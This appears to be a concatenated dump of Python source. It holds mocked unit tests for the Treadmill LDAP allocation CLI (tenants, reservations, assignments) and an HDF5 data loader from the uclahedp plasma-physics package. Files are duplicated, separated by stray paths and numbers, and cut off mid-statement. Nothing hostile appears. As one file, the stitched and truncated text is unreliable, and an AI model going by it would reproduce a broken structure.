'test'}, 'update.return_value': None }))) @mock.patch('treadmill.cli.admin.ldap.allocation._display_tenant', mock.Mock(return_value=None)) def test_tenant_update(self): """Test update a tenant twice. One with appending systems, Second with setting systems. 
""" tenant_admin = treadmill.context.AdminContext.tenant.return_value res = self.runner.invoke( self.alloc_cli, [ 'configure', 'test', '--add-systems', '456' ] ) self.assertEqual(res.exit_code, 0) res = self.runner.invoke( self.alloc_cli, [ 'configure', 'test', '-s', '456', ] ) self.assertEqual(res.exit_code, 0) get_calls = [mock.call('test')] * 2 tenant_admin.get.assert_has_calls( get_calls, any_order=False ) update_calls = [ mock.call('test', {'systems': ['123', '456']}), mock.call('test', {'systems': ['456']}) ] tenant_admin.update.assert_has_calls( update_calls, any_order=False ) @mock.patch('treadmill.context.AdminContext.cell_allocation', mock.Mock(return_value=mock.Mock(**{ 'create.return_value': None, 'get.side_effect': admin_exceptions.NoSuchObjectResult, }))) @mock.patch('treadmill.context.AdminContext.allocation', mock.Mock(return_value=mock.Mock(**{ 'create.return_value': None }))) @mock.patch('treadmill.context.AdminContext.tenant', mock.Mock(return_value=mock.Mock(**{ 'get.return_value': {'systems': [123], 'tenant': 'test'}, }))) @mock.patch('treadmill.cli.admin.ldap.allocation._display_tenant', mock.Mock(return_value=None)) def test_reservation_create(self): """Test creating a reservation. 
""" ca_admin = treadmill.context.AdminContext.cell_allocation.return_value res = self.runner.invoke( self.alloc_cli, [ 'reserve', 'test', '--cell', 'cell', '--env', 'dev', ] ) self.assertEqual(res.exit_code, 0) ca_admin.get.assert_called_once_with(['cell', 'test/dev']) ca_admin.create.assert_called_once_with( ['cell', 'test/dev'], { 'disk': '0M', 'cpu': '0%', 'memory': '0M', 'partition': '_default', 'rank': 100 } ) @mock.patch('treadmill.context.AdminContext.cell_allocation', mock.Mock(return_value=mock.Mock(**{ 'update.return_value': None, 'get.return_value': { 'disk': '0M', 'cpu': '0%', 'memory': '0M', 'partition': '_default', 'rank': 100 }, }))) @mock.patch('treadmill.context.AdminContext.allocation', mock.Mock(return_value=mock.Mock(**{ 'create.side_effect': admin_exceptions.AlreadyExistsResult }))) @mock.patch('treadmill.context.AdminContext.tenant', mock.Mock(return_value=mock.Mock(**{ 'get.return_value': {'systems': [123], 'tenant': 'test'}, }))) @mock.patch('treadmill.cli.admin.ldap.allocation._display_tenant', mock.Mock(return_value=None)) def test_reservation_update(self): """Test updating a reservation. 
""" ca_admin = treadmill.context.AdminContext.cell_allocation.return_value res = self.runner.invoke( self.alloc_cli, [ 'reserve', 'test', '--cell', 'cell', '--env', 'dev', '--rank', 99, '--partition', 'fake', '-c', '58%', '--memory', '66M' ] ) self.assertEqual(res.exit_code, 0) ca_admin.get.assert_called_once_with(['cell', 'test/dev']) ca_admin.update.assert_called_once_with( ['cell', 'test/dev'], { 'cpu': '58%', 'memory': '66M', 'partition': 'fake', 'rank': 99 } ) @mock.patch('treadmill.context.AdminContext.cell_allocation', mock.Mock(return_value=mock.Mock(**{ 'delete.return_value': None, 'get.return_value': { 'disk': '0M', 'cpu': '0%', 'memory': '0M', 'partition': '_default', 'rank': 100 }, }))) @mock.patch('treadmill.context.AdminContext.allocation', mock.Mock(return_value=mock.Mock(**{ 'create.side_effect': admin_exceptions.AlreadyExistsResult }))) @mock.patch('treadmill.context.AdminContext.tenant', mock.Mock(return_value=mock.Mock(**{ 'get.return_value': {'systems': [123], 'tenant': 'test'}, }))) def test_reservation_delete(self): """Test deleting a reservation. 
""" ca_admin = treadmill.context.AdminContext.cell_allocation.return_value res = self.runner.invoke( self.alloc_cli, [ 'reserve', 'test', '--cell', 'cell', '--env', 'dev', '--delete' ] ) self.assertEqual(res.exit_code, 0) ca_admin.get.assert_not_called() ca_admin.delete.assert_called_once_with(['cell', 'test/dev']) @mock.patch('treadmill.context.AdminContext.cell_allocation', mock.Mock(return_value=mock.Mock(**{ 'update.return_value': None, 'get.return_value': { 'assignments': [{'pattern': 'foo.bar*', 'priority': 1}] }, }))) @mock.patch('treadmill.context.AdminContext.allocation', mock.Mock(return_value=mock.Mock(**{ 'create.side_effect': admin_exceptions.AlreadyExistsResult }))) @mock.patch('treadmill.context.AdminContext.tenant', mock.Mock(return_value=mock.Mock(**{ 'get.return_value': {'systems': [123], 'tenant': 'test'}, }))) @mock.patch('treadmill.cli.admin.ldap.allocation._display_tenant', mock.Mock(return_value=None)) def test_assign_update(self): """Test updating assignment, append assignment to existing assignments. 
""" ca_admin = treadmill.context.AdminContext.cell_allocation.return_value res = self.runner.invoke( self.alloc_cli, [ 'assign', 'test', '--env', 'dev', '--cell', 'cell', '--pattern', 'foo.baz*', '--priority', '1', ] ) self.assertEqual(res.exit_code, 0) ca_admin.update.assert_called_once_with( ['cell', 'test/dev'], { 'assignments': [ {'pattern': 'foo.bar*', 'priority': 1}, {'pattern': 'foo.baz*', 'priority': 1}, ] } ) @mock.patch('treadmill.context.AdminContext.cell_allocation', mock.Mock(return_value=mock.Mock(**{ 'update.return_value': None, 'get.return_value': {'cell': 'cell'}, }))) @mock.patch('treadmill.context.AdminContext.allocation', mock.Mock(return_value=mock.Mock(**{ 'create.side_effect': admin_exceptions.AlreadyExistsResult }))) @mock.patch('treadmill.context.AdminContext.tenant', mock.Mock(return_value=mock.Mock(**{ 'get.return_value': {'systems': [123], 'tenant': 'test'}, }))) @mock.patch('treadmill.cli.admin.ldap.allocation._display_tenant', mock.Mock(return_value=None)) def test_assign_update_empty(self): """Test updating assignment, append assignment to empty cell alloc. 
""" ca_admin = treadmill.context.AdminContext.cell_allocation.return_value res = self.runner.invoke( self.alloc_cli, [ 'assign', 'test', '--env', 'dev', '--cell', 'cell', '--pattern', 'foo.bar*', '--priority', '1', ] ) self.assertEqual(res.exit_code, 0) ca_admin.update.assert_called_once_with( ['cell', 'test/dev'], {'assignments': [{'pattern': 'foo.bar*', 'priority': 1}]} ) @mock.patch('treadmill.context.AdminContext.cell_allocation', mock.Mock(return_value=mock.Mock(**{ 'update.return_value': None, 'get.return_value': { 'assignments': [{'pattern': 'foo.bar*', 'priority': 1}] }, }))) @mock.patch('treadmill.context.AdminContext.allocation', mock.Mock(return_value=mock.Mock(**{ 'get.return_value': {}, 'create.side_effect': admin_exceptions.AlreadyExistsResult }))) @mock.patch('treadmill.context.AdminContext.tenant', mock.Mock(return_value=mock.Mock(**{ 'get.return_value': {'systems': [123], 'tenant': 'test'}, }))) @mock.patch('treadmill.cli.admin.ldap.allocation._display_tenant', mock.Mock(return_value=None)) def test_assign_update_priority(self): """Test updating assignment, update priority of an existing assignment. 
""" ca_admin = treadmill.context.AdminContext.cell_allocation.return_value res = self.runner.invoke( self.alloc_cli, [ 'assign', 'test', '--env', 'dev', '--cell', 'cell', '--pattern', 'foo.bar*', '--priority', '100', ] ) self.assertEqual(res.exit_code, 0) ca_admin.update.assert_called_once_with( ['cell', 'test/dev'], {'assignments': [{'pattern': 'foo.bar*', 'priority': 100}]} ) @mock.patch('treadmill.context.AdminContext.cell_allocation', mock.Mock(return_value=mock.Mock(**{ 'update.return_value': None, 'get.return_value': { 'assignments': [ {'pattern': 'foo.bar*', 'priority': 1}, {'pattern': 'foo.baz*', 'priority': 1}, ] }, }))) @mock.patch('treadmill.context.AdminContext.allocation', mock.Mock(return_value=mock.Mock(**{ 'get.return_value': {}, 'create.side_effect': admin_exceptions.AlreadyExistsResult }))) @mock.patch('treadmill.context.AdminContext.tenant', mock.Mock(return_value=mock.Mock(**{ 'get.return_value': {'systems': [123], 'tenant': 'test'}, }))) @mock.patch('treadmill.cli.admin.ldap.allocation._display_tenant', mock.Mock(return_value=None)) def test_assign_delete(self): """Test deleting assignment. 
""" ca_admin = treadmill.context.AdminContext.cell_allocation.return_value res = self.runner.invoke( self.alloc_cli, [ 'assign', 'test', '--env', 'dev', '--cell', 'cell', '--pattern', 'foo.baz*', '--delete' ] ) self.assertEqual(res.exit_code, 0) ca_admin.update.assert_called_once_with( ['cell', 'test/dev'], { 'assignments': [ {'pattern': 'foo.bar*', 'priority': 1}, ] } ) @mock.patch('treadmill.context.AdminContext.cell_allocation', mock.Mock(return_value=mock.Mock(**{ 'update.return_value': None, 'get.return_value': { 'assignments': [ {'pattern': 'foo.bar*', 'priority': 1}, {'pattern': 'foo.baz*', 'priority': 1}, ] }, }))) @mock.patch('treadmill.context.AdminContext.allocation', mock.Mock(return_value=mock.Mock(**{ 'create.side_effect': admin_exceptions.AlreadyExistsResult }))) @mock.patch('treadmill.context.AdminContext.tenant', mock.Mock(return_value=mock.Mock(**{ 'get.return_value': {'systems': [123], 'tenant': 'test'}, }))) @mock.patch('treadmill.cli.admin.ldap.allocation._display_tenant', mock.Mock(return_value=None)) def test_assign_delete_nonexistent(self): """Test deleting nonexistent assignment. """ ca_admin = treadmill.context.AdminContext.cell_allocation.return_value res = self.runner.invoke( self.alloc_cli, [ 'assign', 'test', '--env', 'dev', '--cell', 'cell', '--pattern', 'foo.nonexistent*', '--delete' ] ) self.assertEqual(res.exit_code, 0) # Assignment should be untouched ca_admin.update.assert_called_once_with( ['cell', 'test/dev'], { 'assignments': [ {'pattern': 'foo.bar*', 'priority': 1}, {'pattern': 'foo.baz*', 'priority': 1}, ] }, ) if __name__ == '__main__': unittest.main()
lib/python/treadmill/tests/cli/admin/ldap/allocation_test.py
from __future__ import absolute_import from __future__ import division from __future__ import print_function from __future__ import unicode_literals import unittest import click import click.testing import mock import treadmill from treadmill import plugin_manager from treadmill.admin import exc as admin_exceptions class AdminLdapAllocationTest(unittest.TestCase): """Mock test for treadmill.cli.admin.ldap.allocation""" def setUp(self): """Setup common test variables""" self.runner = click.testing.CliRunner() self.alloc_mod = plugin_manager.load( 'treadmill.cli.admin.ldap', 'allocation' ) self.alloc_cli = self.alloc_mod.init() @mock.patch('treadmill.context.AdminContext.tenant', mock.Mock(return_value=mock.Mock(**{ 'get.side_effect': admin_exceptions.NoSuchObjectResult, 'create.return_value': None }))) @mock.patch('treadmill.cli.admin.ldap.allocation._display_tenant', mock.Mock(return_value=None)) def test_tenant_create(self): """Test creating a tenant. """ tenant_admin = treadmill.context.AdminContext.tenant.return_value res = self.runner.invoke( self.alloc_cli, [ 'configure', 'test', '-s', '123', ] ) self.assertEqual(res.exit_code, 0) tenant_admin.get.assert_called_once_with('test') tenant_admin.create.assert_called_once_with( 'test', {'systems': ['123']} ) @mock.patch('treadmill.context.AdminContext.tenant', mock.Mock(return_value=mock.Mock(**{ 'get.return_value': {'systems': [123], 'tenant': 'test'}, 'update.return_value': None }))) @mock.patch('treadmill.cli.admin.ldap.allocation._display_tenant', mock.Mock(return_value=None)) def test_tenant_update(self): """Test update a tenant twice. One with appending systems, Second with setting systems. 
""" tenant_admin = treadmill.context.AdminContext.tenant.return_value res = self.runner.invoke( self.alloc_cli, [ 'configure', 'test', '--add-systems', '456' ] ) self.assertEqual(res.exit_code, 0) res = self.runner.invoke( self.alloc_cli, [ 'configure', 'test', '-s', '456', ] ) self.assertEqual(res.exit_code, 0) get_calls = [mock.call('test')] * 2 tenant_admin.get.assert_has_calls( get_calls, any_order=False ) update_calls = [ mock.call('test', {'systems': ['123', '456']}), mock.call('test', {'systems': ['456']}) ] tenant_admin.update.assert_has_calls( update_calls, any_order=False ) @mock.patch('treadmill.context.AdminContext.cell_allocation', mock.Mock(return_value=mock.Mock(**{ 'create.return_value': None, 'get.side_effect': admin_exceptions.NoSuchObjectResult, }))) @mock.patch('treadmill.context.AdminContext.allocation', mock.Mock(return_value=mock.Mock(**{ 'create.return_value': None }))) @mock.patch('treadmill.context.AdminContext.tenant', mock.Mock(return_value=mock.Mock(**{ 'get.return_value': {'systems': [123], 'tenant': 'test'}, }))) @mock.patch('treadmill.cli.admin.ldap.allocation._display_tenant', mock.Mock(return_value=None)) def test_reservation_create(self): """Test creating a reservation. 
""" ca_admin = treadmill.context.AdminContext.cell_allocation.return_value res = self.runner.invoke( self.alloc_cli, [ 'reserve', 'test', '--cell', 'cell', '--env', 'dev', ] ) self.assertEqual(res.exit_code, 0) ca_admin.get.assert_called_once_with(['cell', 'test/dev']) ca_admin.create.assert_called_once_with( ['cell', 'test/dev'], { 'disk': '0M', 'cpu': '0%', 'memory': '0M', 'partition': '_default', 'rank': 100 } ) @mock.patch('treadmill.context.AdminContext.cell_allocation', mock.Mock(return_value=mock.Mock(**{ 'update.return_value': None, 'get.return_value': { 'disk': '0M', 'cpu': '0%', 'memory': '0M', 'partition': '_default', 'rank': 100 }, }))) @mock.patch('treadmill.context.AdminContext.allocation', mock.Mock(return_value=mock.Mock(**{ 'create.side_effect': admin_exceptions.AlreadyExistsResult }))) @mock.patch('treadmill.context.AdminContext.tenant', mock.Mock(return_value=mock.Mock(**{ 'get.return_value': {'systems': [123], 'tenant': 'test'}, }))) @mock.patch('treadmill.cli.admin.ldap.allocation._display_tenant', mock.Mock(return_value=None)) def test_reservation_update(self): """Test updating a reservation. 
""" ca_admin = treadmill.context.AdminContext.cell_allocation.return_value res = self.runner.invoke( self.alloc_cli, [ 'reserve', 'test', '--cell', 'cell', '--env', 'dev', '--rank', 99, '--partition', 'fake', '-c', '58%', '--memory', '66M' ] ) self.assertEqual(res.exit_code, 0) ca_admin.get.assert_called_once_with(['cell', 'test/dev']) ca_admin.update.assert_called_once_with( ['cell', 'test/dev'], { 'cpu': '58%', 'memory': '66M', 'partition': 'fake', 'rank': 99 } ) @mock.patch('treadmill.context.AdminContext.cell_allocation', mock.Mock(return_value=mock.Mock(**{ 'delete.return_value': None, 'get.return_value': { 'disk': '0M', 'cpu': '0%', 'memory': '0M', 'partition': '_default', 'rank': 100 }, }))) @mock.patch('treadmill.context.AdminContext.allocation', mock.Mock(return_value=mock.Mock(**{ 'create.side_effect': admin_exceptions.AlreadyExistsResult }))) @mock.patch('treadmill.context.AdminContext.tenant', mock.Mock(return_value=mock.Mock(**{ 'get.return_value': {'systems': [123], 'tenant': 'test'}, }))) def test_reservation_delete(self): """Test deleting a reservation. 
""" ca_admin = treadmill.context.AdminContext.cell_allocation.return_value res = self.runner.invoke( self.alloc_cli, [ 'reserve', 'test', '--cell', 'cell', '--env', 'dev', '--delete' ] ) self.assertEqual(res.exit_code, 0) ca_admin.get.assert_not_called() ca_admin.delete.assert_called_once_with(['cell', 'test/dev']) @mock.patch('treadmill.context.AdminContext.cell_allocation', mock.Mock(return_value=mock.Mock(**{ 'update.return_value': None, 'get.return_value': { 'assignments': [{'pattern': 'foo.bar*', 'priority': 1}] }, }))) @mock.patch('treadmill.context.AdminContext.allocation', mock.Mock(return_value=mock.Mock(**{ 'create.side_effect': admin_exceptions.AlreadyExistsResult }))) @mock.patch('treadmill.context.AdminContext.tenant', mock.Mock(return_value=mock.Mock(**{ 'get.return_value': {'systems': [123], 'tenant': 'test'}, }))) @mock.patch('treadmill.cli.admin.ldap.allocation._display_tenant', mock.Mock(return_value=None)) def test_assign_update(self): """Test updating assignment, append assignment to existing assignments. 
""" ca_admin = treadmill.context.AdminContext.cell_allocation.return_value res = self.runner.invoke( self.alloc_cli, [ 'assign', 'test', '--env', 'dev', '--cell', 'cell', '--pattern', 'foo.baz*', '--priority', '1', ] ) self.assertEqual(res.exit_code, 0) ca_admin.update.assert_called_once_with( ['cell', 'test/dev'], { 'assignments': [ {'pattern': 'foo.bar*', 'priority': 1}, {'pattern': 'foo.baz*', 'priority': 1}, ] } ) @mock.patch('treadmill.context.AdminContext.cell_allocation', mock.Mock(return_value=mock.Mock(**{ 'update.return_value': None, 'get.return_value': {'cell': 'cell'}, }))) @mock.patch('treadmill.context.AdminContext.allocation', mock.Mock(return_value=mock.Mock(**{ 'create.side_effect': admin_exceptions.AlreadyExistsResult }))) @mock.patch('treadmill.context.AdminContext.tenant', mock.Mock(return_value=mock.Mock(**{ 'get.return_value': {'systems': [123], 'tenant': 'test'}, }))) @mock.patch('treadmill.cli.admin.ldap.allocation._display_tenant', mock.Mock(return_value=None)) def test_assign_update_empty(self): """Test updating assignment, append assignment to empty cell alloc. 
""" ca_admin = treadmill.context.AdminContext.cell_allocation.return_value res = self.runner.invoke( self.alloc_cli, [ 'assign', 'test', '--env', 'dev', '--cell', 'cell', '--pattern', 'foo.bar*', '--priority', '1', ] ) self.assertEqual(res.exit_code, 0) ca_admin.update.assert_called_once_with( ['cell', 'test/dev'], {'assignments': [{'pattern': 'foo.bar*', 'priority': 1}]} ) @mock.patch('treadmill.context.AdminContext.cell_allocation', mock.Mock(return_value=mock.Mock(**{ 'update.return_value': None, 'get.return_value': { 'assignments': [{'pattern': 'foo.bar*', 'priority': 1}] }, }))) @mock.patch('treadmill.context.AdminContext.allocation', mock.Mock(return_value=mock.Mock(**{ 'get.return_value': {}, 'create.side_effect': admin_exceptions.AlreadyExistsResult }))) @mock.patch('treadmill.context.AdminContext.tenant', mock.Mock(return_value=mock.Mock(**{ 'get.return_value': {'systems': [123], 'tenant': 'test'}, }))) @mock.patch('treadmill.cli.admin.ldap.allocation._display_tenant', mock.Mock(return_value=None)) def test_assign_update_priority(self): """Test updating assignment, update priority of an existing assignment. 
""" ca_admin = treadmill.context.AdminContext.cell_allocation.return_value res = self.runner.invoke( self.alloc_cli, [ 'assign', 'test', '--env', 'dev', '--cell', 'cell', '--pattern', 'foo.bar*', '--priority', '100', ] ) self.assertEqual(res.exit_code, 0) ca_admin.update.assert_called_once_with( ['cell', 'test/dev'], {'assignments': [{'pattern': 'foo.bar*', 'priority': 100}]} ) @mock.patch('treadmill.context.AdminContext.cell_allocation', mock.Mock(return_value=mock.Mock(**{ 'update.return_value': None, 'get.return_value': { 'assignments': [ {'pattern': 'foo.bar*', 'priority': 1}, {'pattern': 'foo.baz*', 'priority': 1}, ] }, }))) @mock.patch('treadmill.context.AdminContext.allocation', mock.Mock(return_value=mock.Mock(**{ 'get.return_value': {}, 'create.side_effect': admin_exceptions.AlreadyExistsResult }))) @mock.patch('treadmill.context.AdminContext.tenant', mock.Mock(return_value=mock.Mock(**{ 'get.return_value': {'systems': [123], 'tenant': 'test'}, }))) @mock.patch('treadmill.cli.admin.ldap.allocation._display_tenant', mock.Mock(return_value=None)) def test_assign_delete(self): """Test deleting assignment. 
""" ca_admin = treadmill.context.AdminContext.cell_allocation.return_value res = self.runner.invoke( self.alloc_cli, [ 'assign', 'test', '--env', 'dev', '--cell', 'cell', '--pattern', 'foo.baz*', '--delete' ] ) self.assertEqual(res.exit_code, 0) ca_admin.update.assert_called_once_with( ['cell', 'test/dev'], { 'assignments': [ {'pattern': 'foo.bar*', 'priority': 1}, ] } ) @mock.patch('treadmill.context.AdminContext.cell_allocation', mock.Mock(return_value=mock.Mock(**{ 'update.return_value': None, 'get.return_value': { 'assignments': [ {'pattern': 'foo.bar*', 'priority': 1}, {'pattern': 'foo.baz*', 'priority': 1}, ] }, }))) @mock.patch('treadmill.context.AdminContext.allocation', mock.Mock(return_value=mock.Mock(**{ 'create.side_effect': admin_exceptions.AlreadyExistsResult }))) @mock.patch('treadmill.context.AdminContext.tenant', mock.Mock(return_value=mock.Mock(**{ 'get.return_value': {'systems': [123], 'tenant': 'test'}, }))) @mock.patch('treadmill.cli.admin.ldap.allocation._display_tenant', mock.Mock(return_value=None)) def test_assign_delete_nonexistent(self): """Test deleting nonexistent assignment. """ ca_admin = treadmill.context.AdminContext.cell_allocation.return_value res = self.runner.invoke( self.alloc_cli, [ 'assign', 'test', '--env', 'dev', '--cell', 'cell', '--pattern', 'foo.nonexistent*', '--delete' ] ) self.assertEqual(res.exit_code, 0) # Assignment should be untouched ca_admin.update.assert_called_once_with( ['cell', 'test/dev'], { 'assignments': [ {'pattern': 'foo.bar*', 'priority': 1}, {'pattern': 'foo.baz*', 'priority': 1}, ] }, ) if __name__ == '__main__': unittest.main()
0.700485
0.16398
import numpy as np from astropy import units as u import os from uclahedp.tools import csv as csvtools from uclahedp.tools import hdf as hdftools from uclahedp.tools import util import h5py def hrrToRaw( run, probe, hdf_dir, csv_dir, dest, verbose=False, debug=False): """ Retreives the appropriate metadata for a run and probe in a given data directory, then reads in the data from the HRR hdf5 output file. Parameters ---------- run: int Run number probe: str Probe name hdf_dir: str (path) Path to the directory where HDF files are stored csv_dir: str(path) Path to the directory where metadata CSV's are stored dest: hdfPath object Path string to location data should be written out verbose: boolean Set this flag to true to enable print statements throughout the code, including a runtime-until-completion estimate during the data reading loop. Returns ------- dest (Filepath to destination file) """ #Create a dictionary of attributes from the entire directory of CSV #files that applies to this probe and run attrs = csvtools.getAllAttrs(csv_dir, run, probe) #Check that some required keys are present, throw a fatal error if not req_keys = ['datafile'] csvtools.missingKeys(attrs, req_keys, fatal_error=True) #TODO: Should this file take a data_dir and determine the filename #automatically, or should a source hdf file be given, leaving the program #that calls this one to determine the HDF file name? 
src = os.path.join(hdf_dir, attrs['datafile'][0] + '.hdf5') #Create an array of channels #channel_arr = tuples of form (resource number, channel number) #Indexd from 1, to match load/LAPD.py channel_arr = [] nchan = 1 while True: digistr = 'resource' + str(int(nchan)) chanstr = 'chan' + str(int(nchan)) if chanstr in attrs.keys() and digistr in attrs.keys(): #Check to make sure channel has actual non-nan values if not np.isnan(attrs[digistr][0]) and not np.isnan(attrs[chanstr][0]): #Append the channel to the list to be extracted channel_arr.append( (attrs[digistr][0], attrs[chanstr][0]) ) nchan = nchan + 1 else: break if debug: print("{:.0f} Data Channels found in csv".format( len(channel_arr))) #Create a dictionary of position channels #channel_arr = tuples of form (resource number, channel number) ax = ['x', 'y', 'z'] pos_chan = {} nchan = 1 for i in range(3): digistr = ax[i] + 'pos_resource' chanstr = ax[i] + 'pos_chan' if chanstr in attrs.keys() and digistr in attrs.keys(): #Check to make sure channel has actual non-nan values if not np.isnan(attrs[digistr][0]) and not np.isnan(attrs[chanstr][0]): #Append the channel to the list to be extracted pos_chan[ax[i]] = ( attrs[digistr][0], attrs[chanstr][0]) else: pos_chan[ax[i]] = None else: pos_chan[ax[i]] = None if debug: print("{:.0f} Pos Channels found in csv".format(len(pos_chan))) #Determine the number of channels from the channel array nchan = len(channel_arr) #Read some variables from the src file with h5py.File(src, 'r') as sf: digi_name = 'RESOURCE ' + str(channel_arr[0][0]) print(digi_name) digigrp = sf[digi_name] resource_type = digigrp.attrs['RESOURCE TYPE'].decode('utf-8') attrs['RESOURCE ALIAS'] = (digigrp.attrs['RESOURCE ALIAS'].decode('utf-8'),'') attrs['RESOURCE DESCRIPTION'] = (digigrp.attrs['RESOURCE DESCRIPTION'].decode('utf-8'),'') attrs['RESOURCE ID'] = (digigrp.attrs['RESOURCE ID'],'') attrs['RESOURCE MODEL'] = (digigrp.attrs['RESOURCE MODEL'].decode('utf-8'),'') attrs['RESOURCE TYPE'] = 
(resource_type,'') resource_unit = digigrp['CHANNEL 0']['UNITS'][0].decode('utf-8') attrs['motion_unit'] = ('mm', '') if resource_type == 'SCOPE': dataname = 'TRACE' nshots = digigrp['CHANNEL 0'][dataname].shape[0] nti = digigrp['CHANNEL 0'][dataname].shape[1] dt = digigrp['CHANNEL 0'][dataname].attrs['WAVEFORM DT'] * u.s attrs['dt'] = [str(dt.value), str(dt.unit) ] #attrs['dt'] = [s.encode('utf-8') for s # in [str(dt.value), str(dt.unit) ] ] elif resource_type == 'MOTOR BOARD': dataname = 'POSITION' nshots = digigrp['CHANNEL 0'][dataname].shape[0] nti = 1 #Create the destination file with h5py.File(dest.file, "a") as df: #Create the dest group, throw error if it exists if dest.group is not '/' and dest.group in df.keys(): raise hdftools.hdfGroupExists(dest) grp = df[dest.group] #Initialize the output data array if 'data' in grp.keys(): raise hdftools.hdfDatasetExists(str(dest) + ' -> ' + "'data'") #Create the dataset + associated attributes grp.require_dataset("data", (nshots, nti, nchan), np.float32, chunks=(1, np.min([nti, 20000]), 1), compression='gzip') grp['data'].attrs['unit'] = resource_unit dimlabels = ['shots', 'time', 'chan'] grp['data'].attrs['dimensions'] = [s.encode('utf-8') for s in dimlabels] #Open the hdf5 file and copy the data over with h5py.File(src) as sf: #Initialize time-remaining printout tr = util.timeRemaining(nchan*nshots) #Loop through the channels and shots, reading one-by-one into the #output dataset for chan in range(nchan): digi_name = 'RESOURCE ' + str(channel_arr[chan][0]) chan_name = 'CHANNEL ' + str(channel_arr[chan][1]) if verbose: print("Reading channel: " + str(chan+1) + '/' + str(nchan)) for shot in range(nshots): if verbose: tr.updateTimeRemaining(nshots*chan + shot) #Read the data from the hdf5 file grp['data'][shot,:,chan] = sf[digi_name][chan_name][dataname][shot, ...] 
if pos_chan['x'] is not None or pos_chan['y'] is not None or pos_chan['z'] is not None: grp.require_dataset('pos', (nshots, 3), np.float32) ax = ['x', 'y', 'z'] unit_factor = (1.0*u.Unit(attrs['motion_unit'][0])).to(u.cm).value attrs['motion_unit'] = ('cm', '') for i, a in enumerate(ax): if pos_chan[a] is not None: resname = 'RESOURCE ' + str(pos_chan[a][0]) channame = 'CHANNEL ' + str(int(pos_chan[a][1])) try: posdata = sf[resname][channame]['POSITION'][:]*unit_factor except KeyError: print("(!) POSITION Information not found for " + resname) print("If motion is not included in run, set resource to NA in csv") #Handle the case where the multiple data points were #taken at a position so npos!=nshots npos = posdata.size if npos != nshots: posdata = np.repeat(posdata, int(nshots/npos)) grp['pos'][:, i] = posdata else: grp['pos'][:, i] = np.zeros(nshots) #Create the axes grp.require_dataset('shots', (nshots,), np.float32, chunks=True )[:] = np.arange(nshots) grp['shots'].attrs['unit'] = '' grp.require_dataset('chan', (nchan,), np.float32, chunks=True)[:] = np.arange(nchan) grp['chan'].attrs['unit'] = '' if resource_type == 'SCOPE': t = np.arange(nti)*dt grp.require_dataset('time', (nti,), np.float32, chunks=True)[:] = t.value grp['time'].attrs['unit'] = str(t.unit) #Write the attrs dictioanry into attributes of the new data group hdftools.writeAttrs(attrs, grp) return dest #Simple test program if __name__ == "__main__": #hdf_dir = os.path.join("F:", "LAPD_Mar2018", "HDF") #csv_dir = os.path.join("F:", "LAPD_Mar2018", "METADATA") #dest = hdftools.hdfPath( r"F:/LAPD_Mar2018/RAW/run102_PL11B_raw.hdf5") probe = 'tdiode' #probe = 'PLL_B1' run = 6 hdf_dir = '/Volumes/PVH_DATA/2019BIERMANN/HDF/' csv_dir = '/Volumes/PVH_DATA/2019BIERMANN/METADATA/' dest = hdftools.hdfPath( '/Volumes/PVH_DATA/2019BIERMANN/RAW/' + 'run' + str(run) + '_' + probe + '_raw.hdf5') #Delete the output file if it already exists try: os.remove(dest.file) except FileNotFoundError: pass print('reading') 
util.mem() tstart = util.timeTest() x = hrrToRaw(run, probe, hdf_dir, csv_dir, dest, verbose=True) util.timeTest(t0=tstart) util.mem() print('done')
uclahedp/load/hrr.py
import numpy as np from astropy import units as u import os from uclahedp.tools import csv as csvtools from uclahedp.tools import hdf as hdftools from uclahedp.tools import util import h5py def hrrToRaw( run, probe, hdf_dir, csv_dir, dest, verbose=False, debug=False): """ Retreives the appropriate metadata for a run and probe in a given data directory, then reads in the data from the HRR hdf5 output file. Parameters ---------- run: int Run number probe: str Probe name hdf_dir: str (path) Path to the directory where HDF files are stored csv_dir: str(path) Path to the directory where metadata CSV's are stored dest: hdfPath object Path string to location data should be written out verbose: boolean Set this flag to true to enable print statements throughout the code, including a runtime-until-completion estimate during the data reading loop. Returns ------- dest (Filepath to destination file) """ #Create a dictionary of attributes from the entire directory of CSV #files that applies to this probe and run attrs = csvtools.getAllAttrs(csv_dir, run, probe) #Check that some required keys are present, throw a fatal error if not req_keys = ['datafile'] csvtools.missingKeys(attrs, req_keys, fatal_error=True) #TODO: Should this file take a data_dir and determine the filename #automatically, or should a source hdf file be given, leaving the program #that calls this one to determine the HDF file name? 
src = os.path.join(hdf_dir, attrs['datafile'][0] + '.hdf5') #Create an array of channels #channel_arr = tuples of form (resource number, channel number) #Indexd from 1, to match load/LAPD.py channel_arr = [] nchan = 1 while True: digistr = 'resource' + str(int(nchan)) chanstr = 'chan' + str(int(nchan)) if chanstr in attrs.keys() and digistr in attrs.keys(): #Check to make sure channel has actual non-nan values if not np.isnan(attrs[digistr][0]) and not np.isnan(attrs[chanstr][0]): #Append the channel to the list to be extracted channel_arr.append( (attrs[digistr][0], attrs[chanstr][0]) ) nchan = nchan + 1 else: break if debug: print("{:.0f} Data Channels found in csv".format( len(channel_arr))) #Create a dictionary of position channels #channel_arr = tuples of form (resource number, channel number) ax = ['x', 'y', 'z'] pos_chan = {} nchan = 1 for i in range(3): digistr = ax[i] + 'pos_resource' chanstr = ax[i] + 'pos_chan' if chanstr in attrs.keys() and digistr in attrs.keys(): #Check to make sure channel has actual non-nan values if not np.isnan(attrs[digistr][0]) and not np.isnan(attrs[chanstr][0]): #Append the channel to the list to be extracted pos_chan[ax[i]] = ( attrs[digistr][0], attrs[chanstr][0]) else: pos_chan[ax[i]] = None else: pos_chan[ax[i]] = None if debug: print("{:.0f} Pos Channels found in csv".format(len(pos_chan))) #Determine the number of channels from the channel array nchan = len(channel_arr) #Read some variables from the src file with h5py.File(src, 'r') as sf: digi_name = 'RESOURCE ' + str(channel_arr[0][0]) print(digi_name) digigrp = sf[digi_name] resource_type = digigrp.attrs['RESOURCE TYPE'].decode('utf-8') attrs['RESOURCE ALIAS'] = (digigrp.attrs['RESOURCE ALIAS'].decode('utf-8'),'') attrs['RESOURCE DESCRIPTION'] = (digigrp.attrs['RESOURCE DESCRIPTION'].decode('utf-8'),'') attrs['RESOURCE ID'] = (digigrp.attrs['RESOURCE ID'],'') attrs['RESOURCE MODEL'] = (digigrp.attrs['RESOURCE MODEL'].decode('utf-8'),'') attrs['RESOURCE TYPE'] = 
